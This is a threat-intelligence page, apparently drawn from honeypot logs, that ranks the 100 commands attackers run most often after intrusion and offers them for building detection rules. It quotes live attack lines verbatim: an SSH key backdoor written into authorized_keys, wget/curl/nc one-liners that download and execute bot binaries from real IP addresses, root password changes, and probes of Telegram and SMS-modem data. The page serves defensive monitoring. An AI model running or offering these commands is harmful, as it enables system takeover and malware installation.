Updated: Dezember 2025

Top 100 Malicious Commands

Most executed commands by attackers after gaining system access. Useful for intrusion detection and incident response.

10,929 commands in 24h

$cd ~; chattr -ia .ssh; lockr -ia .ssh

198 IPs555x

$lockr -ia .ssh

198 IPs555x

cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

195 IPs545x

$cat /proc/cpuinfo | grep name | wc -l

175 IPs470x

$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

173 IPs463x

$uname -a

180 IPs462x

$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

177 IPs460x

$ls -lh $(which ls)

174 IPs459x

$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

174 IPs459x

10.

$which ls

174 IPs459x

11.

$lscpu | grep Model

177 IPs459x

12.

$crontab -l

173 IPs456x

13.

$uname

175 IPs456x

14.

$top

173 IPs455x

15.

$whoami

176 IPs455x

16.

$uname -m

175 IPs454x

17.

$cat /proc/cpuinfo | grep model | grep name | wc -l

173 IPs453x

18.

$w

171 IPs451x

19.

$Enter new UNIX password:

149 IPs297x

20.

$Enter new UNIX password:

149 IPs297x

21.

rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

111 IPs171x

22.

$cat /proc/uptime 2 > /dev/null | cut -d. -f1

33 IPs138x

23.

$uname -s -v -n -m 2 > /dev/null

47 IPs120x

24.

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc || grep -c "^processor" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version

47 IPs120x

25.

$uname -s -v -n -r -m

20 IPs90x

26.

$uname -m 2 > /dev/null

33 IPs69x

27.

$/bin/./uname -s -v -n -r -m

15 IPs68x

28.

cd /data/local/tmp/; rm *; busybox wget http://94.154.35.154/arm.uhavenobotsxd; curl http://94.154.35.154/arm.uhavenobotsxd -O; chmod +x arm.uhavenobotsxd; ./arm.uhavenobotsxd android; busybox wget http://94.154.35.154/arm5.uhavenobotsxd; curl http://94.154.35.154/arm5.uhavenobotsxd -O; chmod +x arm5.uhavenobotsxd; ./arm5.uhavenobotsxd android; busybox wget http://94.154.35.154/arm6.uhavenobotsxd; curl http://94.154.35.154/arm6.uhavenobotsxd -O; chmod +x arm6.uhavenobotsxd; ./arm6.uhavenobotsxd

1 IPs33x

29.

cd /data/local/tmp/; busybox wget http://31.97.147.189/w.sh; sh w.sh; curl http://31.97.147.189/c.sh; sh c.sh; wget http://31.97.147.189/wget.sh; sh wget.sh; curl http://31.97.147.189/wget.sh; sh wget.sh; busybox wget http://31.97.147.189/wget.sh; sh wget.sh; busybox curl http://31.97.147.189/wget.sh; sh wget.sh

2 IPs23x

30.

for d in /data/local/tmp /tmp /dev/shm /var/tmp /data /; do if touch $d/.w 2>/dev/null; then cd $d; rm .w; break; fi; done; rm -f x; arch=$(uname -m); if [ "$arch" = "x86_64" ]; then BIN="shadow.x86_64"; elif [ "$arch" = "i686" ] || [ "$arch" = "i386" ]; then BIN="shadow.x86"; elif [ "$arch" = "mips" ]; then BIN="shadow.mips"; elif [ "$arch" = "mipsel" ]; then BIN="shadow.mpsl"; elif [ "$arch" = "armv7l" ] || [ "$arch" = "armv7" ]; then BIN="shadow.arm7"; elif [ "$arch" = "armv6l" ]; then BIN="s

1 IPs19x

31.

$uname -s -v -n -r-m

3 IPs15x

32.

cd /data/local/tmp/; busybox wget http://130.12.180.20:36695/w.sh; sh w.sh; curl http://130.12.180.20:36695/c.sh; sh c.sh; wget http://130.12.180.20:36695/wget.sh; sh wget.sh; curl http://130.12.180.20:36695/wget.sh; sh wget.sh; busybox wget http://130.12.180.20:36695/wget.sh; sh wget.sh; busybox curl http://130.12.180.20:36695/wget.sh; sh wget.sh

2 IPs13x

33.

$echo SCANNER_TEST

10 IPs12x

34.

cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps

1 IPs9x

35.

$curl2

1 IPs9x

36.

$echo "cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps" | sh

1 IPs9x

37.

$system

4 IPs8x

38.

$shell

4 IPs8x

39.

$uname -s -m

7 IPs7x

40.

$q

3 IPs6x

41.

$echo SHELL_TEST

2 IPs5x

42.

$pm path com.ufo.miner

3 IPs5x

43.

$/ip cloud print

2 IPs4x

44.

$while read i

4 IPs4x

45.

$sh

4 IPs4x

46.

$enable

4 IPs4x

47.

cd /data/local/tmp; su 0 mkdir .wws || mkdir .wws; cd .wws; toybox nc 130.12.180.76 3338 > parm7; toybox nc 130.12.180.76 3336 > parm5; toybox nc 130.12.180.76 3337 > parm6; toybox nc 130.12.180.76 3335 > parm; su 0 chmod 777 parm7 parm5 parm6 parm || chmod 777 parm7 parm5 parm6 parm; su 0 ./parm7 arm7; ./parm5; ./parm6; ./parm; su 0 ./parm7 arm5 || ./parm5 arm5 || ./parm6 arm5 || ./parm arm5;

1 IPs4x

48.

$Accept-Encoding: gzip

2 IPs4x

49.

$dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s

3 IPs3x

50.

$rm .s; exit

3 IPs3x

51.

cd /data/local/tmp/; busybox wget http://213.202.211.46/w.sh; sh w.sh; curl http://213.202.211.46/c.sh; sh c.sh; wget http://213.202.211.46/wget.sh; sh wget.sh; curl http://213.202.211.46/wget.sh; sh wget.sh; busybox wget http://213.202.211.46/wget.sh; sh wget.sh; busybox curl http://213.202.211.46/wget.sh; sh wget.sh

1 IPs2x

52.

chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtB

1 IPs2x

53.

$then

1 IPs2x

54.

$cat /proc/cpuinfo

2 IPs2x

55.

$ps | grep '[Mm]iner'

2 IPs2x

56.

$ps -ef | grep '[Mm]iner'

2 IPs2x

57.

ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

2 IPs2x

58.

$locate D877F783D5D3EF8Cs

2 IPs2x

59.

$Accept: */*

1 IPs2x

60.

$fi

1 IPs2x

61.

$echo "root:5H2Qyrl6Y2mW"|chpasswd|bash

2 IPs2x

62.

$echo "root:6kzsHk8OZHZa"|chpasswd|bash

2 IPs2x

63.

$echo Hi | cat -n

2 IPs2x

64.

$ifconfig

2 IPs2x

65.

$rm /data/local/tmp/ufo.apk

2 IPs2x

66.

$echo "123456\nHhIwZmxckf0G\nHhIwZmxckf0G\n"|passwd

1 IPs1x

67.

$echo "123456\n7oeF57BcCpuc\n7oeF57BcCpuc\n"|passwd

1 IPs1x

68.

$echo "123456\n0sJeGrjeFrAK\n0sJeGrjeFrAK\n"|passwd

1 IPs1x

69.

$echo "123456\n0pw9ovxJbggS\n0pw9ovxJbggS\n"|passwd

1 IPs1x

70.

$Macintosh ; Intel Mac OS X 10_15_7

1 IPs1x

71.

$echo "12345678\nAGIOxFpKmzKc\nAGIOxFpKmzKc\n"|passwd

1 IPs1x

72.

$echo "123456789\nUN9fCms1KADP\nUN9fCms1KADP\n"|passwd

1 IPs1x

73.

$echo "123456789\nTfO86uQzuTYx\nTfO86uQzuTYx\n"|passwd

1 IPs1x

74.

$echo "123456789\nIbBjsBl5n8vy\nIbBjsBl5n8vy\n"|passwd

1 IPs1x

75.

$Macintosh

1 IPs1x

76.

$echo "123456789\n76f8iqg8PUKm\n76f8iqg8PUKm\n"|passwd

1 IPs1x

77.

$echo "123456789\n3fum88QeLtjz\n3fum88QeLtjz\n"|passwd

1 IPs1x

78.

$cat /proc/mounts; /bin/busybox NMYXY

1 IPs1x

79.

$echo "123456789\n1nkQNGjqfAtZ\n1nkQNGjqfAtZ\n"|passwd

1 IPs1x

80.

$echo "123123\nzj9A7hujHD9q\nzj9A7hujHD9q\n"|passwd

1 IPs1x

81.

$cat /proc/mounts; /bin/busybox KUQDM

1 IPs1x

82.

$echo "123123\nhgDaFiby1R0D\nhgDaFiby1R0D\n"|passwd

1 IPs1x

83.

$echo "123123\nVvtZhVMGfs8l\nVvtZhVMGfs8l\n"|passwd

1 IPs1x

84.

$cat /proc/mounts; /bin/busybox KKIVX

1 IPs1x

85.

$echo "123123\nRl0K6b9pzdSi\nRl0K6b9pzdSi\n"|passwd

1 IPs1x

86.

$echo "1\nGj3o5ExzXb28\nGj3o5ExzXb28\n"|passwd

1 IPs1x

87.

$echo "123123\n2LBlWS6oXQBb\n2LBlWS6oXQBb\n"|passwd

1 IPs1x

88.

$cat /proc/mounts; /bin/busybox BHKVR

1 IPs1x

89.

$Intel Mac OS X 10_15_7

1 IPs1x

90.

$/bin/busybox KUQDM

1 IPs1x

91.

$echo "1\nAoTGIpdjChLv\nAoTGIpdjChLv\n"|passwd

1 IPs1x

92.

$echo "1\nA0bOof82ZkPP\nA0bOof82ZkPP\n"|passwd

1 IPs1x

93.

$echo "1\n6dfFsVTMfhXj\n6dfFsVTMfhXj\n"|passwd

1 IPs1x

94.

$echo "1\n2HE2czVPRFdx\n2HE2czVPRFdx\n"|passwd

1 IPs1x

95.

$echo "1\n0KuBIVaoehoB\n0KuBIVaoehoB\n"|passwd

1 IPs1x

96.

$echo "1\nQOdM0eKiXJe7\nQOdM0eKiXJe7\n"|passwd

1 IPs1x

97.

$echo "1\nW0jCDx0eKJpP\nW0jCDx0eKJpP\n"|passwd

1 IPs1x

98.

$echo "1\nf0FjM6lnFlbn\nf0FjM6lnFlbn\n"|passwd

1 IPs1x

99.

$echo "1\nnpPRqp8RrWqz\nnpPRqp8RrWqz\n"|passwd

1 IPs1x

100.

$echo "123\nxIQxRc4LJ4BE\nxIQxRc4LJ4BE\n"|passwd

1 IPs1x

Reconnaissance

uname, whoami, cat /etc/passwd

Download

wget, curl, tftp

Persistence

crontab, chmod, chattr

Lateral Movement

ssh, scp, ping

Detection Use

These commands can be used to create detection rules in SIEM, IDS/IPS, and monitoring systems. Monitor these patterns in your logs to detect intrusions.